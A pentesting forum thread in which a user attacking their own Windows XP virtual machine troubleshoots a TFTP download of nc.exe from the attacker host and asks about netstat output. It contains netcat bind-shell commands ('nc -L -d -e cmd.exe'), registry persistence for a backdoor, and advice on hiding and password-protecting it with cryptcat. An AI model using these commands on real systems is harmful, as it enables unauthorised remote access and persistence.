Results 1 to 10 of 10

Thread: Getting timeout from tftp

  1. #1
    Member
    Join Date
    May 2008
    Posts
    190

    Default Getting timeout from tftp

    I'm running pentests on my virtual os, which is running windows xp sp1. I use fast-track and open a session. Then on my pentesting computer(192.168.1.128) I run start-tftp, which starts a tftp server on port 69. I cp nc.exe into the /tmp dir on that box. Then back on the virtual os, I run

    tftp -i <192.168.1.128> get nc.exe

    but it returns timeout. I've tried putting full paths and adding a destination full path
    i.e.

    tftp -i 192.168.1.128 get /tmp/nc.exe c:\
    and it returns "c:\ is a directory"

    So I tried

    tftp -i 192.168.1.128 GET nc.exe c:\nc.exe
    and still I got timeout

    I tried just running

    tftp 192.168.1.128

    to see if I can at least establish a connection on that port but kernel just returns the usage help text. What's causing the tftp connection to timeout? I also tried

    tftp -i 192.168.1.128 PUT xxx
    and still timeout

  2. #2
    Member
    Join Date
    May 2008
    Posts
    190

    Default

    I'm thinking maybe it's just buggy cause I'm running tftp from a virtual os.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default

    Syntax is correct, try renaming nc.exe to "n" for example and see if you can transfer it. Also try restarting the virtual machine. Are you running BT as your main host and winxp as your virtual? I think if the networking is set as "host only" the main OS (BT) can TFTP and ping the vmware network address but not the other way around. So if you are trying to TFTP from your virtual host that would cause a timeout error.

  4. #4
    Member
    Join Date
    May 2008
    Posts
    190

    Default

    Got it, lol forgot to put

    sudo start-tftpd

    works like a charm, yeah I'm using bt3 as main host and winxp home as the virtual. thanks. Just started getting in the habit of running a user account full time while pentesting instead of using my root account. It's a pain putting sudo in front of my all my commands. Is there a better method?

    Some other questions.

    1. I read somewhere that using tftp to transfer files generates a lot of noise, whereas netcat is a lot quieter. However, you'd have to use tftp at least once to transfer over netcat right? Or am I missing something?

    2. When interacting with a session, is there an end character to end commands running in the sessions? For instance, if I'm running ping with no set number of how many times to ping, usually I'd hit control - c to end that command, but in this case control - c would end the session, also I know that control - z backgrounds the sessions, but when I do that and then later come back to that sessions using sessions -i <id no.> it just hangs.

    3. Why is it that when you open a session and create tftp and netcat connections does the kernel allow the connections. Usually, if you're in windows xp desktop and you're about to make a connection you get a prompt by the windows firewall asking to allow or not. Why is it that you don't need to verify the connection in these cases? Is it because you're establishing the connections in the cmd or is it because you have SYSTEM privs?

    4. Is it possible to set a nc -p 6666 -L -d -e cmd.exe with any sort of authentication. For example, let's say you add this line to the registry to start up everytime the box boots. Then that port would be open to anybody that scans the ports and sees that port listening. Is there anyway to protect that backdoor from other hackers? What if maybe you set a password for the SYSTEM account, then you use the nc -p 23 -L -t -d -e cmd.exe for telnet negotiations. If you use that will that prompt for a user name and password?

  5. #5

    Default

    4. Is it possible to set a nc -p 6666 -L -d -e cmd.exe with any sort of authentication. For example, let's say you add this line to the registry to start up everytime the box boots. Then that port would be open to anybody that scans the ports and sees that port listening. Is there anyway to protect that backdoor from other hackers?
    You may want to look into using cryptcat, which can authenticate with a password and also uses encryption so that prying (sniffing) eyes won't capture what you are doing.

    For your "ping" problem, if in linux, use "-c" to specify the number of pings to send. In windows, the default is 5, so it will stop on its own.

    I would also look further into metasploit (I assume you are using this since you mention "sessions -i) about permanent, installed backdoors. You may find something useful there.

    Good Luck...

  6. #6
    Member
    Join Date
    May 2008
    Posts
    190

    Default

    Awesome. Going back to the control - c ping thing, what if you're using

    netstat -a 5 so where it cycles through all the active connections by page every 5 secs, indefinitely. How could you stop this? Perhaps, is there an option to see the netstat -a output page by page? There was nothing in the netstat usage text, I need something like dir /p but netstat -a /p hehe.

  7. #7

    Default

    probably have to put that into a batch file using a while loop.

    I usually run netstat when I first get on a box, a couple times during my remote session and then right before I disconnect. If you are running a continual netstat, you have lost your ability to run anything else in that shell and I really can't see the reason for getting on the box in the first place if that is all you want to run on it.

    Is there a particular reason you want to run a continual netstat or was it just an example?

  8. #8
    Member
    Join Date
    May 2008
    Posts
    190

    Default

    Yes, when I run netstat -a, it outputs so quick that I can't see the beginning output. I want to be able to see all the output.

  9. #9

    Default

    Quote Originally Posted by drakoth777 View Post
    Yes, when I run netstat -a, it outputs so quick that I can't see the beginning output. I want to be able to see all the output.
    Code:
    netstat -an | more  (works in windows and linux)
    Also, from experience I have learned to run all my remote shells in a scripted session. That way, I can go back and review what I did and what info was presented later on.

    Good Luck...

  10. #10
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Default

    More specifically
    netstat -ant (TCP)
    netstat -anu (UDP)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •